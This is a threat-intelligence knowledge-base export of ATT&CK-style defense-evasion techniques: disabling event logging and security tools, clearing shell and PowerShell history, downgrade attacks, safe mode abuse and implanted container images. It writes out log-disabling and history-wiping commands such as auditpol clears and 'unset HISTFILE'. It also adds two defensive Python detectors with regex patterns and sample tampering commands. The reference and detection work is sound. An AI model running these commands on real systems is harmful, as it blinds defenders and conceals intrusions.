Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) on a non-traditional and potentially less scrutinized port (i.e. Non-Standard Port).<sup>[[change_rdp_port_conti](https://app.tidalcyber.com/references/c0deb077-6c26-52f1-9e7c-d1fb535a02a0)]</sup>

The tag is: misp-galaxy:technique="Disable or Modify System Firewall"

Disable or Modify Tools

Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.<sup>[[SCADAfence_ransomware](https://app.tidalcyber.com/references/24c80db5-37a7-46ee-b232-f3c3ffb10f0a)]</sup>

Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://app.tidalcyber.com/technique/154dccf2-21fa-4aee-99cc-d959d841f8b1), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.<sup>[[OutFlank System Calls](https://app.tidalcyber.com/references/c4c3370a-2d6b-4ebd-961e-58d584066377)]</sup><sup>[[MDSec System Calls](https://app.tidalcyber.com/references/b461e226-1317-4ce4-a195-ba4c4957db99)]</sup>

Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.<sup>[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]</sup>

On network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.<sup>[[Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation](https://app.tidalcyber.com/references/a43dd8ce-23d6-5768-8522-6973dc45e1ac)]</sup><sup>[[Analysis of FG-IR-22-369](https://app.tidalcyber.com/references/f12b141e-6bb2-5563-9665-5756fec2d5e7)]</sup>

In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.

Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.<sup>[[chasing_avaddon_ransomware](https://app.tidalcyber.com/references/c5aeed6b-2d5d-4d49-b05e-261d565808d9)]</sup><sup>[[dharma_ransomware](https://app.tidalcyber.com/references/dfd168c0-40da-4402-a123-963eb8e2125a)]</sup><sup>[[demystifying_ryuk](https://app.tidalcyber.com/references/3dc684c7-14de-4dc0-9f11-79160c4f5038)]</sup><sup>[[doppelpaymer_crowdstrike](https://app.tidalcyber.com/references/54b5d8af-21f0-4d1c-ada8-b87db85dd742)]</sup> For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.<sup>[[demystifying_ryuk](https://app.tidalcyber.com/references/3dc684c7-14de-4dc0-9f11-79160c4f5038)]</sup>

Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c)), which may lead to bypassing anti-tampering features.<sup>[[avoslocker_ransomware](https://app.tidalcyber.com/references/ea2756ce-a183-4c80-af11-92374ad045b2)]</sup>

The tag is: misp-galaxy:technique="Disable or Modify Tools"

Disable Windows Event Logging

Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.<sup>[[Windows Log Events](https://app.tidalcyber.com/references/53464503-6e6f-45d8-a208-1820678deeac)]</sup> This data is used by security tools and analysts to generate detections.

The EventLog service maintains event logs from various system components and applications.<sup>[[EventLog_Core_Technologies](https://app.tidalcyber.com/references/2a1f452f-57b6-4764-b474-befa7787642d)]</sup> By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to <code>Security Settings\Local Policies\Audit Policy</code> for basic audit policy settings or <code>Security Settings\Advanced Audit Policy Configuration</code> for advanced audit policy settings.<sup>[[Audit_Policy_Microsoft](https://app.tidalcyber.com/references/9ff43f64-7fcb-4aa3-9599-9d00774d8da5)]</sup><sup>[[Advanced_sec_audit_policy_settings](https://app.tidalcyber.com/references/9aef57b1-1a2e-4833-815e-887616cc0570)]</sup> <code>auditpol.exe</code> may also be used to set audit policies.<sup>[[auditpol](https://app.tidalcyber.com/references/20d18ecf-d7d3-4433-9a3c-c28be71de4b1)]</sup>

Adversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the <code>Set-Service -Name EventLog -Status Stopped</code> or <code>sc config eventlog start= disabled</code> commands (<code>sc.exe</code> requires the space after <code>start=</code>), followed by manually stopping the service using <code>Stop-Service -Name EventLog</code>.<sup>[[Disable_Win_Event_Logging](https://app.tidalcyber.com/references/0fa5e507-33dc-40ea-b960-bcd9aa024ab1)]</sup><sup>[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]</sup> Additionally, the service may be disabled by modifying the "Start" value in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog</code> then restarting the system for the change to take effect.<sup>[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]</sup>

There are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the "Start" value in the key <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security</code>, then reboot the system to disable the Security EventLog.<sup>[[winser19_file_overwrite_bug_twitter](https://app.tidalcyber.com/references/158d971e-2f96-5200-8a87-d3887de30ff0)]</sup> Second, with Administrator privilege, adversaries may modify the same values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System</code> and <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application</code> to disable the entire EventLog.<sup>[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]</sup>

Additionally, adversaries may use <code>auditpol</code> and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the <code>/success</code> or <code>/failure</code> parameters. For example, <code>auditpol /set /category:"Account Logon" /success:disable /failure:disable</code> turns off auditing for the Account Logon category.<sup>[[auditpol.exe_STRONTIC](https://app.tidalcyber.com/references/c8a305b3-cd17-4415-a740-32787da703cd)]</sup><sup>[[T1562.002_redcanaryco](https://app.tidalcyber.com/references/e136f5a2-d4c2-4c6c-8f72-0f8ed9abeed1)]</sup> To clear the audit policy, adversaries may run the following lines: <code>auditpol /clear /y</code> or <code>auditpol /remove /allusers</code>.<sup>[[T1562.002_redcanaryco](https://app.tidalcyber.com/references/e136f5a2-d4c2-4c6c-8f72-0f8ed9abeed1)]</sup>
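
The Python below is an added example, not code from the page, for checking a Windows host for the tampering described in this section (and the Sysmon autologger key mentioned under Disable or Modify Tools). It works on data that can be collected off-box, so it runs anywhere: a registry snapshot exported as a path-to-values mapping, and process command lines from EDR or event 4688 telemetry. The snapshot, command lines and the idea that autologger Start should be 1 and the EventLog service Start should be 2 are assumptions stated in the code; the sample data is constructed.

```python
"""Check a Windows host for event-logging tampering.

Added example, not from the page. Input (a) is a registry snapshot exported
from the host as {key_path: {value_name: data}}, input (b) is a list of
process command lines. All sample data below is constructed.
"""
import re

HKLM = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet"
AUTOLOGGER_KEYS = [
    HKLM + r"\Control\WMI\Autologger\EventLog-Security",
    HKLM + r"\Control\WMI\Autologger\EventLog-System",
    HKLM + r"\Control\WMI\Autologger\EventLog-Application",
    HKLM + r"\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational",
]
EVENTLOG_SERVICE = HKLM + r"\Services\EventLog"
SERVICE_AUTO, SERVICE_DISABLED = 2, 4  # service "Start" values

COMMAND_PATTERNS = [
    (re.compile(r"\bauditpol(\.exe)?\s+/clear\b", re.I), "audit policy cleared"),
    (re.compile(r"\bauditpol(\.exe)?\s+/remove\s+/allusers\b", re.I), "per-user audit policy removed"),
    (re.compile(r"\bauditpol(\.exe)?\s+/set\b.*?/(success|failure):disable\b", re.I), "audit category disabled"),
    (re.compile(r"\bsc(\.exe)?\s+config\s+eventlog\s+start=\s*disabled\b", re.I), "EventLog service start type set to disabled"),
    (re.compile(r"\bSet-Service\b.*?\bEventLog\b.*?\b(Stopped|Disabled)\b", re.I), "EventLog service stopped or disabled via Set-Service"),
    (re.compile(r"\bStop-Service\b.*?\bEventLog\b", re.I), "EventLog service stopped via Stop-Service"),
    (re.compile(r"\breg(\.exe)?\s+add\b.*?\\(Autologger\\EventLog-|Services\\EventLog\b)", re.I), "EventLog registry key edited with reg.exe"),
]


def audit_registry(snapshot):
    """Return findings for autologgers not set to start and a disabled service."""
    findings = []
    for key in AUTOLOGGER_KEYS:
        start = snapshot.get(key, {}).get("Start")
        if start is not None and start != 1:  # assumed healthy value: 1
            findings.append(f"{key.rsplit(chr(92), 1)[-1]}: Start={start} (expected 1)")
    svc_start = snapshot.get(EVENTLOG_SERVICE, {}).get("Start")
    if svc_start == SERVICE_DISABLED:
        findings.append(f"EventLog service: Start={svc_start} (expected {SERVICE_AUTO})")
    return findings


def scan_commands(command_lines):
    """Return (command, reason) pairs for command lines matching a pattern."""
    hits = []
    for cmd in command_lines:
        for pattern, reason in COMMAND_PATTERNS:
            if pattern.search(cmd):
                hits.append((cmd, reason))
                break
    return hits


# Constructed snapshot: Security and Sysmon autologgers off, service disabled.
SAMPLE_SNAPSHOT = {
    AUTOLOGGER_KEYS[0]: {"Start": 0, "Enable": 1},
    AUTOLOGGER_KEYS[1]: {"Start": 1},
    AUTOLOGGER_KEYS[2]: {"Start": 1},
    AUTOLOGGER_KEYS[3]: {"Start": 0},
    EVENTLOG_SERVICE: {"Start": 4, "ImagePath": r"%SystemRoot%\System32\svchost.exe -k LocalServiceNetworkRestricted"},
}
# Constructed process command lines; the 4th and 6th are benign.
SAMPLE_COMMANDS = [
    r'auditpol /set /category:"Account Logon" /success:disable /failure:disable',
    r"sc config eventlog start= disabled",
    r'powershell -NoP -c "Stop-Service -Name EventLog -Force"',
    r"auditpol /get /category:*",
    r"reg add HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security /v Start /t REG_DWORD /d 0 /f",
    r'powershell -c "Set-Service -Name EventLog -StartupType Automatic"',
]


def demo():
    return audit_registry(SAMPLE_SNAPSHOT), scan_commands(SAMPLE_COMMANDS)


if __name__ == "__main__":
    reg_findings, cmd_hits = demo()
    for f in reg_findings:
        print("REGISTRY:", f)
    for cmd, reason in cmd_hits:
        print("COMMAND:", reason, "<-", cmd)
```

The registry check is the one that survives a reboot-based attack: a "Start" value of 0 on an EventLog-* autologger leaves the service running but the channel silent, which process-creation telemetry alone will not reveal once the machine has restarted.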

By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.

The tag is: misp-galaxy:technique="Disable Windows Event Logging"

Downgrade Attack

Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation.

Adversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) or Network Sniffing.<sup>[[Praetorian TLS Downgrade Attack 2014](https://app.tidalcyber.com/references/4375602d-4b5f-476d-82f8-3cef84d3378e)]</sup> For example, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) versions 5+ include Script Block Logging (SBL), which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://app.tidalcyber.com/technique/e3be3d76-0a36-4060-8003-3b39c557f728) while running malicious scripts that may have otherwise been detected.<sup>[[CrowdStrike BGH Ransomware 2021](https://app.tidalcyber.com/references/a4cb3caf-e7ef-4662-93c6-63a0c3352a32)]</sup><sup>[[Mandiant BYOL 2018](https://app.tidalcyber.com/references/104a1c1c-0899-4ff9-a5c4-73de702c467d)]</sup><sup>[[att_def_ps_logging](https://app.tidalcyber.com/references/52212570-b1a6-4249-99d4-3bcf66c27140)]</sup>

Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.<sup>[[Targeted SSL Stripping Attacks Are Real](https://app.tidalcyber.com/references/714528e8-0f2e-50a3-93c0-c560a34ba973)]</sup><sup>[[Crowdstrike Downgrade](https://app.tidalcyber.com/references/47856c5f-6c4c-5b4c-bbc1-ccb6848d9b74)]</sup>

The tag is: misp-galaxy:technique="Downgrade Attack"

Impair Command History Logging

Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they’ve done.

On Linux and macOS, the shell keeps the current session’s command history in memory and, when the shell exits (for example, when the user logs off), writes it to the file named by the <code>HISTFILE</code> environment variable, which for bash defaults to <code>~/.bash_history</code> in the user’s home directory. The <code>HISTCONTROL</code> environment variable determines which commands are kept by the <code>history</code> command and therefore which eventually reach <code>~/.bash_history</code>. <code>HISTCONTROL</code> does not exist by default on macOS, but can be set by the user and will be respected.

Adversaries may clear the history environment variable (<code>unset HISTFILE</code>) or set the command history size to zero (<code>export HISTFILESIZE=0</code>) to prevent logging of commands. Additionally, <code>HISTCONTROL</code> can be configured to ignore commands that start with a space by simply setting it to <code>ignorespace</code>. <code>HISTCONTROL</code> can also be set to ignore duplicate commands by setting it to <code>ignoredups</code>. In some Linux systems, this is set by default to <code>ignoreboth</code>, which covers both of the previous examples. This means that a command typed with a leading space (" ls") will not be saved, but "ls" would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.

On Windows systems, the <code>PSReadLine</code> module tracks commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code> by default). Adversaries may change where these logs are saved using <code>Set-PSReadLineOption -HistorySavePath {File Path}</code>. This will cause <code>ConsoleHost_history.txt</code> to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command <code>Set-PSReadlineOption -HistorySaveStyle SaveNothing</code>.<sup>[[Microsoft PowerShell Command History](https://app.tidalcyber.com/references/6c873fb4-db43-4bad-b5e4-a7d45cbe796f)]</sup><sup>[[Sophos PowerShell command audit](https://app.tidalcyber.com/references/441f289c-7fdc-4cf1-9379-960be75c7202)]</sup><sup>[[Sophos PowerShell Command History Forensics](https://app.tidalcyber.com/references/9cff28da-c379-49e7-b971-7dccc72054fc)]</sup>

Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to disable historical command logging (e.g. <code>no logging</code>).

The tag is: misp-galaxy:technique="Impair Command History Logging"

Indicator Blocking

An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting<sup>[[Microsoft Lamin Sept 2017](https://app.tidalcyber.com/references/84b8b159-6e85-4329-8903-aca156f4ed84)]</sup> or even disabling host-based sensors, such as Event Tracing for Windows (ETW)<sup>[[Microsoft About Event Tracing 2018](https://app.tidalcyber.com/references/689d944f-ad66-4908-91fb-bb1ecdafe8d9)]</sup>, by tampering with settings that control the collection and flow of event telemetry.<sup>[[Medium Event Tracing Tampering 2018](https://app.tidalcyber.com/references/cd1a7b9a-183f-4acf-95c8-14d9475d0551)]</sup> These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) or [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a).

For example, adversaries may modify the File value in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security</code> to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.<sup>[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]</sup>

ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) <code>Set-EtwTraceProvider</code> cmdlet or by interfacing directly with the Registry to make alterations.

In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.

In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities and facilitate follow-on behaviors.<sup>[[LemonDuck](https://app.tidalcyber.com/references/3a7ea56a-3b19-4b69-a206-6eb7c4ae609d)]</sup>

The tag is: misp-galaxy:technique="Indicator Blocking"

Safe Mode Boot

Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.<sup>[[Microsoft Safe Mode](https://app.tidalcyber.com/references/fdddb25b-22ba-4433-b25f-bad340ffc849)]</sup><sup>[[Sophos Snatch Ransomware 2019](https://app.tidalcyber.com/references/63019d16-07ec-4e53-98b7-529cc09b8429)]</sup>

Adversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.<sup>[[Microsoft bcdedit 2021](https://app.tidalcyber.com/references/40dedfcb-f666-4f2d-a518-5cd4ae2e273c)]</sup>

Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b)). Malicious [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) (COM) objects may also be registered and loaded in safe mode.<sup>[[Sophos Snatch Ransomware 2019](https://app.tidalcyber.com/references/63019d16-07ec-4e53-98b7-529cc09b8429)]</sup><sup>[[CyberArk Labs Safe Mode 2016](https://app.tidalcyber.com/references/bd9c14dd-0e2a-447b-a245-f548734d2400)]</sup><sup>[[Cybereason Nocturnus MedusaLocker 2020](https://app.tidalcyber.com/references/f7b41120-8455-409f-ad9c-815c2c43edfd)]</sup><sup>[[BleepingComputer REvil 2021](https://app.tidalcyber.com/references/790ef274-aea4-49b7-8b59-1b95185c5f50)]</sup>

The tag is: misp-galaxy:technique="Safe Mode Boot"

Spoof Security Alerting

Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.<sup>[[BlackBasta](https://app.tidalcyber.com/references/c7e55e37-d051-5111-8d0a-738656f88650)]</sup> Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.

Rather than or in addition to [Indicator Blocking](https://app.tidalcyber.com/technique/154dccf2-21fa-4aee-99cc-d959d841f8b1), an adversary can spoof positive affirmations that security tools are continuing to function even after legitimate security tools have been disabled (e.g., [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6)). An adversary can also present a “healthy” system status even after infection. This can be abused to enable further malicious activity by delaying defender responses.

For example, adversaries may show a fake Windows Security GUI and tray icon with a “healthy” system status after Windows Defender and other system tools have been disabled.<sup>[[BlackBasta](https://app.tidalcyber.com/references/c7e55e37-d051-5111-8d0a-738656f88650)]</sup>

The tag is: misp-galaxy:technique="Spoof Security Alerting"

Impair Defenses

Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.

Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.<sup>[[Emotet shutdown](https://app.tidalcyber.com/references/02e6c7bf-f81c-53a3-b771-fd77d4cdb5a0)]</sup>

Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.

The tag is: misp-galaxy:technique="Impair Defenses"

Impersonation

Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), or [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary’s ultimate goals, possibly against multiple victims.

In many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims — deceiving them into sending money or divulging information that ultimately enables [Financial Theft](https://app.tidalcyber.com/technique/b9c9fd13-c10c-5e78-aeeb-ac18dc0605f9).

Adversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text, such as "payment", "request", or "urgent", to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversary’s goal.

Impersonation is typically preceded by reconnaissance techniques such as [Gather Victim Identity Information](https://app.tidalcyber.com/technique/aea36489-047e-4c4a-ab26-c51fd3556182) and [Gather Victim Org Information](https://app.tidalcyber.com/technique/e55d2e4b-07d8-4c22-b543-c187be320578) as well as acquiring infrastructure such as email domains (i.e. [Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)) to substantiate their false identity.<sup>[[CrowdStrike-BEC](https://app.tidalcyber.com/references/7e674a8d-e79f-5cb0-8ad2-a7678e647c6f)]</sup>

There is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3) targeting one organization which can then be used to support impersonation against other entities.<sup>[[VEC](https://app.tidalcyber.com/references/4fd7c9f7-4731-524a-b332-9cb7f2c025ae)]</sup>

The tag is: misp-galaxy:technique="Impersonation"

Implant Internal Image

Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images, as well as container images for popular runtimes such as Docker, can be implanted or backdoored. Unlike [Upload Malware](https://app.tidalcyber.com/technique/8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.<sup>[[Rhino Labs Cloud Image Backdoor Technique Sept 2019](https://app.tidalcyber.com/references/8fb46ed8-0c21-4b57-b2a6-89cb28f0abaf)]</sup>

A tool has been developed to facilitate planting backdoors in cloud container images.<sup>[[Rhino Labs Cloud Backdoor September 2019](https://app.tidalcyber.com/references/ac31b781-dbe4-49c2-b7af-dfb23d435ce8)]</sup> If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a Web Shell.<sup>[[Rhino Labs Cloud Image Backdoor Technique Sept 2019](https://app.tidalcyber.com/references/8fb46ed8-0c21-4b57-b2a6-89cb28f0abaf)]</sup>
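
The Python below is an added example, not code from the page or from Rhino Security Labs' tooling, showing the two checks that catch this technique from the defender's side: comparing a registry listing against a pinned baseline of approved image digests (so a replaced image behind an unchanged tag shows up as digest drift), and finding deployment references that resolve by a floating tag rather than by digest, which is exactly what lets an implanted "latest" image get picked up on the next provisioning run. The repositories, digests, principals and manifest references are all constructed.

```python
"""Detect a replaced or floating internal image.

Added example, not from the page or from Rhino Security Labs. All
repositories, digests, principals and manifest references are constructed.
"""


def parse_image_ref(ref):
    """Split 'host[:port]/repo[:tag][@sha256:...]' into (name, tag, digest)."""
    name, _, digest = ref.partition("@")
    tag = None
    # A ':' is a tag separator only if nothing after it contains a '/', so
    # 'registry.example:5000/app' keeps its port while 'app:1.4' yields a tag.
    if ":" in name and "/" not in name.rsplit(":", 1)[1]:
        name, tag = name.rsplit(":", 1)
    return name, tag or "latest", digest or None


def is_pinned(ref):
    """True when the reference names a digest, so the tag cannot be swapped."""
    return parse_image_ref(ref)[2] is not None


def check_registry(listing, approved):
    """Flag images whose digest differs from the approved digest for that tag.

    listing: [{"repository", "tag", "digest", "pushed_by"}, ...] from the registry
    approved: {(repository, tag): digest} maintained by the build pipeline
    """
    findings = []
    for img in listing:
        key = (img["repository"], img["tag"])
        expected = approved.get(key)
        if expected is None:
            findings.append((key, "no approved digest on record", img["pushed_by"]))
        elif expected != img["digest"]:
            findings.append((key, "digest drift", img["pushed_by"]))
    return findings


def unpinned_refs(refs):
    """Return the manifest image references that resolve by tag, not digest."""
    return [r for r in refs if not is_pinned(r)]


# Constructed baseline and registry state: app:latest has been re-pushed by an
# unexpected principal, and a new "tools" repository appeared with no baseline.
GOOD_APP = "sha256:" + "a" * 64
GOOD_DB = "sha256:" + "c" * 64
REPLACED = "sha256:" + "b" * 64

APPROVED = {
    ("registry.example/app", "latest"): GOOD_APP,
    ("registry.example/app", "1.4.2"): GOOD_APP,
    ("registry.example/db", "latest"): GOOD_DB,
}
REGISTRY_LISTING = [
    {"repository": "registry.example/app", "tag": "latest", "digest": REPLACED,
     "pushed_by": "arn:aws:iam::111122223333:user/contractor"},
    {"repository": "registry.example/app", "tag": "1.4.2", "digest": GOOD_APP,
     "pushed_by": "arn:aws:iam::111122223333:role/ci-build"},
    {"repository": "registry.example/db", "tag": "latest", "digest": GOOD_DB,
     "pushed_by": "arn:aws:iam::111122223333:role/ci-build"},
    {"repository": "registry.example/tools", "tag": "latest", "digest": "sha256:" + "d" * 64,
     "pushed_by": "arn:aws:iam::111122223333:user/contractor"},
]
MANIFEST_REFS = [
    "registry.example/app:latest",
    "registry.example/db@" + GOOD_DB,
    "registry.example/app:1.4.2@" + GOOD_APP,
    "registry.example:5000/tools",
]

if __name__ == "__main__":
    for key, reason, who in check_registry(REGISTRY_LISTING, APPROVED):
        print("REGISTRY:", key, reason, "pushed by", who)
    for ref in unpinned_refs(MANIFEST_REFS):
        print("UNPINNED:", ref)
```

The second check is the cheaper fix in practice: a manifest that references `repo@sha256:...` keeps deploying the reviewed image no matter what is pushed under its tag, while `repo:latest` silently adopts whatever the adversary implanted.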

The tag is: misp-galaxy:technique="Implant Internal Image"

Clear Command History

In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they’ve done.

On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, the current session’s history is held in memory by the shell; when the shell exits (for example, when the user logs off), it is written to the file named by the <code>HISTFILE</code> environment variable, which for bash defaults to <code>~/.bash_history</code> in the user’s home directory. The benefit of this is that it allows users to go back to commands they’ve used before in different sessions.

Adversaries may delete their commands from these logs by manually clearing the history (<code>history -c</code>) or deleting the bash history file (<code>rm ~/.bash_history</code>).

Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to clear command history data (<code>clear logging</code> and/or <code>clear history</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>

On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the <code>PSReadLine</code> module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.

The <code>PSReadLine</code> command history tracks the commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code> by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.<sup>[[Microsoft PowerShell Command History](https://app.tidalcyber.com/references/6c873fb4-db43-4bad-b5e4-a7d45cbe796f)]</sup>

Adversaries may run the PowerShell command <code>Clear-History</code> to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the <code>ConsoleHost_history.txt</code> file. Adversaries may also delete the <code>ConsoleHost_history.txt</code> file or edit its contents to hide PowerShell commands they have run.<sup>[[Sophos PowerShell command audit](https://app.tidalcyber.com/references/441f289c-7fdc-4cf1-9379-960be75c7202)]</sup><sup>[[Sophos PowerShell Command History Forensics](https://app.tidalcyber.com/references/9cff28da-c379-49e7-b971-7dccc72054fc)]</sup>
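
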